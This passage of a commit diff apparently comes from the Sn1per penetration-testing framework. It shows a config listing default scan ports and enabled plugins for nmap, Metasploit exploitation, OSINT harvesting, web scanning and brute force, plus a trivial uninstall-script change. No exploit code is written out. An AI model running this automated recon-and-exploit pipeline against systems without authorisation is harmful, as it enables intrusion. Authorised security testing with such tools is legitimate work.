,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
|
||||
DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049"
|
||||
|
||||
THREADS="30"
|
||||
|
||||
# NETWORK PLUGINS
|
||||
NMAP_SCRIPTS="1"
|
||||
METASPLOIT_EXPLOIT="1"
|
||||
SSH_AUDIT="1"
|
||||
SHOW_MOUNT="1"
|
||||
RPC_INFO="1"
|
||||
SMB_ENUM="1"
|
||||
AMAP="1"
|
||||
YASUO="1"
|
||||
|
||||
# OSINT PLUGINS
|
||||
WHOIS="1"
|
||||
GOOHAK="1"
|
||||
INURLBR="1"
|
||||
THEHARVESTER="1"
|
||||
METAGOOFIL="1"
|
||||
|
||||
# ACTIVE WEB PLUGINS
|
||||
BURP_SCAN="1"
|
||||
NIKTO="1"
|
||||
BLACKWIDOW="1"
|
||||
CLUSTERD="1"
|
||||
WPSCAN="1"
|
||||
CMSMAP="1"
|
||||
WAFWOOF="1"
|
||||
WHATWEB="1"
|
||||
WIG="1"
|
||||
SHOCKER="1"
|
||||
JEXBOSS="1"
|
||||
|
||||
# ACTIVE WEB BRUTE FORCE STAGES
|
||||
WEB_BRUTE_STEALTHSCAN="1"
|
||||
WEB_BRUTE_FULLSCAN="1"
|
||||
WEB_BRUTE_EXPLOITSCAN="1"
|
||||
|
||||
# PASSIVE WEB PLUGINS
|
||||
WAYBACKMACHINE="1"
|
||||
SSL="1"
|
||||
PASSIVE_SPIDER="1"
|
||||
CUTYCAPT="1"
|
||||
|
||||
# EMAIL PLUGINS
|
||||
SPOOF_CHECK="1"
|
||||
|
||||
# RECON PLUGINS
|
||||
SLURP="1"
|
||||
SUBLIST3R="1"
|
||||
AMASS="1"
|
||||
SUBFINDER="1"
|
||||
DNSCAN="1"
|
||||
CRTSH="1"
|
||||
SUBOVER="1"
|
||||
CLOUDHUNTER="0"
|
||||
SSL="1"
|
||||
PASSIVE_SPIDER="1"
|
||||
BLACKWIDOW="1"
|
||||
|
|
@ -1,6 +1,7 @@
|
|||
#!/bin/bash
|
||||
# Uninstall script for Sn1per
|
||||
# Created by @xer0dayz - https://xerosecurity.com
|
||||
|
||||
# VARS
|
||||
OKBLUE='\033[94m'
|
||||
OKRED='\033[91m'
|
||||
|
|
|
|||
File diff suppressed because it is too large
Load Diff
2178952
wordlists/domains-insane.txt
2178952
wordlists/domains-insane.txt
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue